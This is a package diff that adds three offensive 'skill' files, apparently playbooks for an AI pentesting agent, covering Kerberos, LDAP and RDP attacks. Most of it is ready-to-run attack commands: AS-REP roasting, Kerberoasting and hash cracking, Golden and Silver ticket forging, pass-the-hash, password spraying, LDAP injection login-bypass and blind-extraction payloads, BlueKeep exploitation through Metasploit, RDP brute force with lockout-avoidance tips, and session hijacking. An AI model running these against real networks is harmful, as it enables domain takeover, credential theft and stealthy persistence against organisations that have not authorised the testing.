@aegis-scan/skills 0.5.0 → 0.5.2

package/skills/offensive/airecon-fork/protocols-kerberos/SKILL.md

@@ -0,0 +1,168 @@
+<!-- aegis-local: forked 2026-05-04 from pikpikcu/airecon@9a21453459d87eefb012ea355c79b593d0d3c0cc (MIT-licensed); attribution preserved, see ATTRIBUTION.md -->
+
+---
+name: kerberos
+description: Kerberos attack techniques — AS-REP Roasting, Kerberoasting, Pass-the-Ticket, Golden/Silver Ticket, Overpass-the-Hash using impacket and kerbrute in Kali Linux
+---
+
+# Kerberos Attacks
+
+Kerberos = Windows/AD authentication protocol. Attack surface: AS-REP Roasting (no pre-auth), Kerberoasting (service tickets crackable offline), ticket forging (Golden/Silver), Pass-the-Ticket.
+
+**Install:**
+```
+pip install impacket --break-system-packages
+sudo apt-get install -y impacket-scripts krb5-user
+# kerbrute: go install github.com/ropnop/kerbrute@latest
+# OR: wget https://github.com/ropnop/kerbrute/releases/latest/download/kerbrute_linux_amd64 -O /usr/local/bin/kerbrute && chmod +x /usr/local/bin/kerbrute
+```
+
+**Port:** 88/TCP+UDP (KDC), 464 (kpasswd)
+
+---
+
+## Reconnaissance
+
+    nmap -p 88 <dc_ip> -sV --open
+    # Kerberos on port 88 = Domain Controller
+
+    # Enumerate users (no credentials needed, if pre-auth disabled):
+    kerbrute userenum --dc <dc_ip> -d domain.local /usr/share/seclists/Usernames/top-usernames-shortlist.txt
+    kerbrute userenum --dc <dc_ip> -d domain.local /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt
+
+---
+
+## AS-REP Roasting (No Pre-Auth Required)
+
+Accounts with "Do not require Kerberos preauthentication" = hash crackable offline:
+
+    # With user list (no credentials):
+    GetNPUsers.py domain.local/ -usersfile users.txt -format hashcat -dc-ip <dc_ip>
+    GetNPUsers.py domain.local/ -usersfile users.txt -format john -dc-ip <dc_ip>
+
+    # With credentials (enumerate vulnerable accounts):
+    GetNPUsers.py domain.local/username:password -request -format hashcat -dc-ip <dc_ip>
+    GetNPUsers.py 'domain.local/' -usersfile users.txt -no-pass -dc-ip <dc_ip>
+
+    # Output: $krb5asrep$23$user@domain.local:... → crack with hashcat
+    hashcat -m 18200 asrep_hashes.txt /usr/share/wordlists/rockyou.txt
+    john asrep_hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt
+
+---
+
+## Kerberoasting (Service Account Ticket Cracking)
+
+Any authenticated user can request TGS tickets for services → crack offline:
+
+    # With valid domain credentials:
+    GetUserSPNs.py domain.local/username:password -dc-ip <dc_ip> -request
+    GetUserSPNs.py domain.local/username:password -dc-ip <dc_ip> -request -outputfile kerberoast.txt
+
+    # With hash (PTH):
+    GetUserSPNs.py domain.local/username -hashes :<NTLM_hash> -dc-ip <dc_ip> -request
+
+    # Crack the TGS ticket:
+    hashcat -m 13100 kerberoast.txt /usr/share/wordlists/rockyou.txt
+    hashcat -m 13100 kerberoast.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule
+    john kerberoast.txt --wordlist=/usr/share/wordlists/rockyou.txt
+
+---
+
+## Pass-the-Ticket (PTT)
+
+Use a stolen Kerberos ticket without knowing the password:
+
+    # Dump tickets on Windows machine (from Mimikatz or secretsdump):
+    # secretsdump.py can dump from LSASS
+    secretsdump.py domain/username:password@<target>
+
+    # Export ticket from ccache (Linux):
+    export KRB5CCNAME=/path/to/ticket.ccache
+
+    # Use with impacket tools:
+    wmiexec.py -k -no-pass domain.local/administrator@<target>
+    smbexec.py -k -no-pass domain.local/administrator@<target>
+    psexec.py -k -no-pass domain.local/administrator@<target>
+
+---
+
+## Overpass-the-Hash (Pass-the-Key)
+
+Convert NTLM hash to Kerberos ticket:
+
+    # Get TGT using NTLM hash:
+    getTGT.py domain.local/username -hashes :<NTLM_hash> -dc-ip <dc_ip>
+    # Creates: username.ccache
+
+    export KRB5CCNAME=username.ccache
+    wmiexec.py -k -no-pass domain.local/username@<target>
+
+---
+
+## Golden Ticket Attack
+
+Forge unlimited TGTs using krbtgt hash (requires DA privs to get krbtgt hash):
+
+    # Step 1: Get krbtgt NTLM hash (requires Domain Admin):
+    secretsdump.py domain/Administrator:password@<dc_ip>
+    # krbtgt:502:aad3b435b51404eeaad3b435b51404ee:<krbtgt_NTLM_hash>:::
+
+    # Step 2: Get domain SID:
+    lookupsid.py domain/username:password@<dc_ip> | grep "Domain SID"
+    # S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX
+
+    # Step 3: Create golden ticket:
+    ticketer.py -nthash <krbtgt_NTLM> -domain-sid S-1-5-21-xxx -domain domain.local Administrator
+    # Creates: Administrator.ccache
+
+    # Step 4: Use ticket:
+    export KRB5CCNAME=Administrator.ccache
+    psexec.py -k -no-pass Administrator@<any_dc_or_machine>
+
+---
+
+## Silver Ticket Attack
+
+Forge TGS for a specific service (doesn't need krbtgt — uses service account hash):
+
+    # Need: service account NTLM hash, domain SID, SPN
+    ticketer.py -nthash <service_NTLM> -domain-sid S-1-5-21-xxx -domain domain.local \
+      -spn cifs/<server>.domain.local Administrator
+    # Access specific service (CIFS = file share):
+    export KRB5CCNAME=Administrator.ccache
+    smbclient.py -k -no-pass //server.domain.local/C$
+
+---
+
+## Password Spraying via Kerberos
+
+    # kerbrute passwordspray — faster than LDAP, avoids some lockout policies:
+    kerbrute passwordspray --dc <dc_ip> -d domain.local users.txt 'Password123!'
+    kerbrute bruteuser --dc <dc_ip> -d domain.local -P /usr/share/wordlists/rockyou.txt username
+
+---
+
+## Kerberos Reconnaissance (No Creds)
+
+    # Find DC via DNS:
+    dig _ldap._tcp.dc._msdcs.domain.local SRV
+    dig _kerberos._tcp.domain.local SRV
+
+    # Enumerate with impacket (anonymous):
+    lookupsid.py domain.local/guest@<dc_ip>       # SID enumeration
+
+---
+
+## Pro Tips
+
+1. AS-REP Roasting needs NO credentials — just a user list → run `kerbrute userenum` first
+2. Kerberoasting requires any valid domain account — service accounts with weak passwords = DA path
+3. hashcat `-m 18200` = AS-REP, `-m 13100` = TGS/Kerberoast — don't mix them
+4. Golden ticket = persistence for 10 years (default lifetime) even after password change
+5. Silver ticket is stealthier than golden — only touches the target service, not the DC
+6. `/etc/krb5.conf` must have correct realm and kdc for kerbrute/impacket to work on Linux
+7. `GetUserSPNs.py` lists all SPNs first, then add `-request` to get crackable tickets
+
+## Summary
+
+Kerberos attacks: `kerbrute userenum` → `GetNPUsers.py` AS-REP (no creds) → `GetUserSPNs.py` Kerberoast (any domain user) → crack with `hashcat` → with DA: `secretsdump.py` krbtgt hash → `ticketer.py` Golden Ticket → persistent DC access. Most impactful AD attack path after initial foothold.

package/skills/offensive/airecon-fork/protocols-ldap/SKILL.md

@@ -0,0 +1,245 @@
+<!-- aegis-local: forked 2026-05-04 from pikpikcu/airecon@9a21453459d87eefb012ea355c79b593d0d3c0cc (MIT-licensed); attribution preserved, see ATTRIBUTION.md -->
+
+---
+name: ldap
+description: LDAP security testing covering injection, anonymous bind, enumeration, LDAP-based auth bypass, and Active Directory LDAP attacks
+---
+
+# LDAP Security Testing
+
+LDAP (Lightweight Directory Access Protocol) is the backbone of enterprise authentication. Attack surface: anonymous bind, LDAP injection in login forms, user/group enumeration, and credential extraction via LDAP queries.
+
+---
+
+## Reconnaissance
+
+### Discovery
+
+    # LDAP port discovery
+    nmap -p 389,636,3268,3269 <target> -sV --open
+
+    # Ports:
+    # 389  — LDAP (plaintext or STARTTLS)
+    # 636  — LDAPS (TLS)
+    # 3268 — Global Catalog (AD)
+    # 3269 — Global Catalog over TLS (AD)
+
+---
+
+## Anonymous Bind
+
+Anonymous bind allows querying without credentials:
+
+    # Test anonymous bind
+    ldapsearch -H ldap://<target>:389 -x -s base namingcontexts
+    ldapsearch -H ldap://<target>:389 -x -s base "(objectclass=*)"
+
+    # If anonymous bind succeeds, enumerate base DN:
+    ldapsearch -H ldap://<target>:389 -x -b "dc=example,dc=com" -s sub "(objectclass=*)"
+
+    # Enumerate users (anonymous):
+    ldapsearch -H ldap://<target>:389 -x -b "dc=example,dc=com" \
+      "(objectclass=person)" uid sAMAccountName mail userPrincipalName
+
+    # Enumerate groups:
+    ldapsearch -H ldap://<target>:389 -x -b "dc=example,dc=com" \
+      "(objectclass=group)" cn member
+
+    # Enumerate computers:
+    ldapsearch -H ldap://<target>:389 -x -b "dc=example,dc=com" \
+      "(objectclass=computer)" cn dNSHostName
+
+    # Get all attributes of a specific user:
+    ldapsearch -H ldap://<target>:389 -x -b "dc=example,dc=com" \
+      "(sAMAccountName=admin)" *
+
+---
+
+## Authenticated Enumeration
+
+    # Bind with credentials
+    ldapsearch -H ldap://<target>:389 -D "cn=user,dc=example,dc=com" -w "password" \
+      -b "dc=example,dc=com" -s sub "(objectclass=*)"
+
+    # Enumerate password policy
+    ldapsearch -H ldap://<target>:389 -D "user@domain.com" -w "pass" \
+      -b "dc=example,dc=com" -s sub "(objectclass=domain)" pwdHistoryLength minPwdLength lockoutThreshold
+
+    # Users with password never expires (high-value targets):
+    ldapsearch -H ldap://<target>:389 -D "user@domain.com" -w "pass" \
+      -b "dc=example,dc=com" \
+      "(&(objectCategory=user)(userAccountControl:1.2.840.113556.1.4.803:=65536))" \
+      sAMAccountName
+
+    # Users with no pre-auth (AS-REP roastable):
+    ldapsearch -H ldap://<target>:389 -D "user@domain.com" -w "pass" \
+      -b "dc=example,dc=com" \
+      "(&(objectCategory=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))" \
+      sAMAccountName
+
+    # Kerberoastable users (SPN set):
+    ldapsearch -H ldap://<target>:389 -D "user@domain.com" -w "pass" \
+      -b "dc=example,dc=com" \
+      "(&(objectCategory=user)(servicePrincipalName=*))" \
+      sAMAccountName servicePrincipalName
+
+---
+
+## LDAP Injection
+
+LDAP injection occurs when user input is embedded in LDAP filter strings without proper escaping.
+
+### Authentication Bypass
+
+Vulnerable login code (conceptually):
+```
+filter = "(&(uid=" + user + ")(userPassword=" + pass + "))"
+```
+
+    # Classic bypass: inject closing parenthesis + wildcard
+    # Username: admin)(&
+    # Password: anything
+    # Resulting filter: (&(uid=admin)(&)(userPassword=anything))
+    # The (&) is always true, so auth succeeds
+
+    # Another bypass: wildcard username + true clause
+    # Username: *)(&
+    # Password: any
+    # Resulting filter: (&(uid=*)(&)(userPassword=any))
+
+    # NULL terminator injection (older LDAP implementations):
+    # Username: admin\00
+
+### Information Disclosure via Boolean Injection
+
+Extract data character by character using blind LDAP injection:
+
+    # Test if first character of admin password is 'a':
+    Username: admin)(userPassword=a*
+    # If auth succeeds → first char is 'a'
+
+    # Binary search to enumerate attribute values:
+    Username: *)(|(uid=a*)(uid=b*
+    Username: admin)(|(cn=a*)(cn=b*
+
+### LDAP Filter Special Characters
+
+Characters requiring escaping in LDAP: `* ( ) \ NUL`
+
+    # Injection probes:
+    *
+    *)(%00
+    *()|%26'
+    admin)(!(&(1=0)
+    )(cn=*))\00
+
+---
+
+## LDAP in Web Apps
+
+### Common Injection Points
+
+    # Login forms with LDAP backend
+    POST /login
+    username=admin)(&  &password=anything
+
+    # Search functions
+    GET /search?query=*)
+    GET /users?uid=*)
+
+    # Directory/lookup features
+    GET /lookup?cn=admin)(|(cn=*
+
+### Testing with Payloads
+
+    # Basic injection test (star wildcard to match any):
+    username=*
+    username=*)
+    username=admin*
+
+    # Boolean-based blind injection:
+    username=admin)(|(description=a*)(description=b*   # Enumerate attribute
+    username=admin)(cn=*)(&(uid=x        # Always-true condition injection
+
+    # Error-based: malformed filters reveal LDAP errors
+    username=admin)(
+    username=)(
+
+---
+
+## LDAP Over Web Proxies
+
+    # If an app uses LDAP for auth and you can see error messages:
+    # Test for verbose error disclosure:
+    username=admin
+    password=wrong
+    # Error: "Invalid credentials 80090308: LdapErr: DSID-0C09044E" → Active Directory
+    # Error: "Invalid credentials" → OpenLDAP
+
+    # Error messages often reveal:
+    # - Domain structure (dc=...)
+    # - LDAP server type (AD vs OpenLDAP)
+    # - Attribute names
+
+---
+
+## LDAP Password Extraction
+
+    # If verbose errors enabled or blind injection possible:
+    # Enumerate userPassword attribute (OpenLDAP, sometimes cleartext):
+    (&(uid=admin)(userPassword=*))    # Check if attribute exists
+    (&(uid=admin)(userPassword=a*))   # First char = 'a'?
+
+    # AD stores password hashes, not plaintext, but:
+    # unicodePwd attribute (hashed)
+    # msDS-PrincipalName, distinguishedName useful for Kerberoasting
+
+---
+
+## LDAP with Python (Automated Testing)
+
+    python3 -c "
+    import ldap3
+    server = ldap3.Server('ldap://<target>', get_info=ldap3.ALL)
+    conn = ldap3.Connection(server, auto_bind=True)
+    print(server.info)
+    conn.search('dc=example,dc=com', '(objectclass=person)', attributes=['*'])
+    for entry in conn.entries:
+        print(entry)
+    "
+
+---
+
+## Tools
+
+    # ldapsearch (OpenLDAP client)
+    ldapsearch -H ldap://<target> -x -b "" -s base +
+
+    # ldapenum
+    ldapenum -u user -p pass -d domain.com <dc_ip>
+
+    # enum4linux-ng
+    enum4linux-ng -A <target> -u user -p pass
+
+    # nmap LDAP scripts
+    nmap --script ldap-brute,ldap-rootdse,ldap-search <target> -p 389
+
+    # Metasploit
+    use auxiliary/gather/ldap_query
+    use auxiliary/scanner/ldap/ldap_login
+
+---
+
+## Pro Tips
+
+1. Anonymous bind is the first test — many org LDAP servers allow it
+2. LDAP injection `*)(&` bypasses auth on vulnerable apps more reliably than SQL injection
+3. Wild card `*` in username field on LDAP-based login = auth bypass on misconfigured implementations
+4. AD LDAP on port 3268 (Global Catalog) allows querying across all domains in forest
+5. Error messages from LDAP auth failures reveal domain structure — always check verbose errors
+6. Users with `userAccountControl=65536` (password never expires) = old service accounts, often weak passwords
+7. LDAP query results from anonymous bind can include email, phone, manager, department — useful for social engineering
+
+## Summary
+
+LDAP testing = anonymous bind enumeration + LDAP injection in login forms + user/group discovery. Anonymous bind to Active Directory is surprisingly common and yields the full user directory. LDAP injection with `*)(&` bypasses authentication in apps that don't sanitize LDAP filters. Always test the login form with LDAP-specific payloads if the app is on an enterprise network.

package/skills/offensive/airecon-fork/protocols-rdp/SKILL.md

@@ -0,0 +1,186 @@
+<!-- aegis-local: forked 2026-05-04 from pikpikcu/airecon@9a21453459d87eefb012ea355c79b593d0d3c0cc (MIT-licensed); attribution preserved, see ATTRIBUTION.md -->
+
+---
+name: rdp
+description: RDP security testing — BlueKeep CVE-2019-0708, DejaBlue, credential brute force, NLA bypass, session hijacking, and RDP-specific misconfiguration testing
+---
+
+# RDP Security Testing
+
+RDP (Remote Desktop Protocol) = Windows remote access. Attack surface: BlueKeep RCE (pre-auth), credential brute force, NLA misconfiguration, session hijacking, and pass-the-hash.
+
+**Install:**
+```
+sudo apt-get install -y freerdp2-x11 xfreerdp rdesktop hydra crowbar ncrack
+pip install rdp-sec-check --break-system-packages
+# rdp-sec-check: git clone https://github.com/CiscoCXSecurity/rdp-sec-check /home/pentester/tools/rdp-sec-check
+```
+
+**Port:** 3389/TCP (default), sometimes 3390+ on non-standard
+
+---
+
+## Reconnaissance
+
+    nmap -p 3389 <target> -sV --open
+    nmap -p 3389 --script rdp-enum-encryption,rdp-vuln-ms12-020,rdp-enum-encryption <target>
+
+    # Security check:
+    python3 /home/pentester/tools/rdp-sec-check/rdp-sec-check.py <target>
+    # Shows: NLA required, encryption level, CredSSP version
+
+---
+
+## CVE-2019-0708 — BlueKeep (Pre-Auth RCE)
+
+Affects: Windows XP, Vista, 7, Server 2003/2008 — no authentication required:
+
+    # Check vulnerability:
+    nmap -p 3389 --script rdp-vuln-ms12-020 <target>
+    # Manual check:
+    python3 -c "
+    import socket, struct
+    # Send specially crafted packet to port 3389
+    # If response = DISCONNECT = likely vulnerable
+    "
+
+    # Metasploit:
+    use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
+    set RHOSTS <target>
+    run
+    # If vulnerable:
+    use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
+    set RHOSTS <target>
+    set TARGET 1   # Windows 7 SP1
+    set LHOST <attacker>
+    run
+
+    # Nuclei:
+    nuclei -t cves/2019/CVE-2019-0708.yaml -u <target>:3389
+
+---
+
+## CVE-2019-1181/1182 — DejaBlue
+
+Affects Windows 7-10, Server 2008-2019 (patched Aug 2019):
+
+    # Check: patch Tuesday Aug 2019 applied?
+    # Metasploit module: exploit/windows/rdp/cve_2019_1181_dejavue (check availability)
+
+---
+
+## Credential Brute Force
+
+    # hydra:
+    hydra -l administrator -P /usr/share/wordlists/rockyou.txt rdp://<target>
+    hydra -L users.txt -P /usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000.txt \
+          rdp://<target> -t 1 -W 3  # Low threads, delay to avoid lockout
+
+    # crowbar (multi-threaded, NLA-aware):
+    crowbar -b rdp -s <target>/32 -u administrator -C /usr/share/wordlists/rockyou.txt
+    crowbar -b rdp -s <target>/32 -U users.txt -C passwords.txt
+
+    # ncrack:
+    ncrack -vv --user administrator -P /usr/share/wordlists/rockyou.txt rdp://<target>
+
+---
+
+## NLA (Network Level Authentication)
+
+NLA = requires authentication before RDP session starts (more secure).
+
+    # Check if NLA required:
+    nmap -p 3389 --script rdp-enum-encryption <target>
+    # "Security: NLA" = NLA enabled
+
+    # Connect without NLA (if NLA disabled):
+    xfreerdp /v:<target> /u:administrator /p:password
+    # With NLA disabled: rdesktop <target>
+
+    # NLA bypass — not generally possible; focus on cred attacks
+    # Exception: CVE-2019-0708 bypasses NLA entirely
+
+---
+
+## Connecting via CLI (xfreerdp)
+
+    # Basic connection:
+    xfreerdp /v:<target> /u:username /p:password /cert:ignore
+
+    # With domain:
+    xfreerdp /v:<target> /u:domain\\username /p:password /cert:ignore
+
+    # Pass-the-Hash (PTH) with xfreerdp:
+    xfreerdp /v:<target> /u:administrator /pth:<NTLM_hash> /cert:ignore
+
+    # Restricted admin mode (PTH without exposing creds on remote):
+    xfreerdp /v:<target> /u:administrator /pth:<NTLM_hash> /cert:ignore +restricted-admin
+
+    # File transfer:
+    xfreerdp /v:<target> /u:user /p:pass /drive:share,/home/kali/share /cert:ignore
+
+    # Run without display (just for testing):
+    xfreerdp /v:<target> /u:user /p:pass /cert:ignore /auth-only  # Test creds only
+
+---
+
+## Pass-the-Hash via RDP
+
+xfreerdp supports NTLM hash directly (no cracking needed):
+
+    # Requires: "Restricted Admin" mode enabled on target (disabled by default on modern Windows)
+    xfreerdp /v:<target> /u:administrator /pth:<NTLM_hash> +restricted-admin /cert:ignore
+
+    # Enable restricted admin remotely (if you have RCE or SMB):
+    # Via crackmapexec:
+    crackmapexec smb <target> -u admin -p pass -M rdp -o ACTION=enable
+
+---
+
+## RDP Session Hijacking (local privilege required)
+
+If you have local admin on a Windows box with active RDP sessions:
+
+    # List active sessions:
+    query session
+    # SESSIONNAME  USERNAME  ID  STATE
+    # rdp-tcp#0    admin     1   Active
+
+    # Hijack session (requires SYSTEM privileges):
+    # From cmd as SYSTEM:
+    tscon 1 /dest:rdp-tcp#0    # Hijack session ID 1
+
+    # Get SYSTEM via token impersonation first:
+    # See postexploit/windows_privesc.md
+
+---
+
+## Sensitive RDP Configuration
+
+    # Check registry for RDP settings (via RCE or SMB file access):
+    # HKLM\System\CurrentControlSet\Control\Terminal Server
+    # fDenyTSConnections = 0 → RDP enabled
+    # SecurityLayer = 0 → no NLA
+    # UserAuthentication = 0 → NLA disabled
+
+    # Enable RDP remotely via crackmapexec:
+    crackmapexec smb <target> -u admin -p pass -M rdp -o ACTION=enable
+
+    # Enable via registry (if cmd access):
+    reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
+    netsh advfirewall firewall set rule group="remote desktop" new enable=yes
+
+---
+
+## Pro Tips
+
+1. Always check BlueKeep first — unpatched Windows 7/2008 is still common in enterprises
+2. `xfreerdp /pth:` = pass-the-hash without cracking; needs restricted admin mode on target
+3. RDP brute force is noisy — use 1 thread and high delay to avoid account lockout
+4. NLA disabled = username appears before auth → enumerate valid users via auth responses
+5. Session hijacking requires SYSTEM — combine with token impersonation (see windows_privesc.md)
+6. `crowbar` handles NLA better than hydra for modern Windows targets
+
+## Summary
+
+RDP testing: `nmap --script rdp-enum-encryption` → BlueKeep check (`auxiliary/scanner/rdp/cve_2019_0708_bluekeep`) → credential brute (`crowbar` for NLA, `hydra` for no-NLA) → `xfreerdp /pth:` for pass-the-hash → session hijacking if local admin. BlueKeep on unpatched Windows 7/2008 = zero-credential RCE.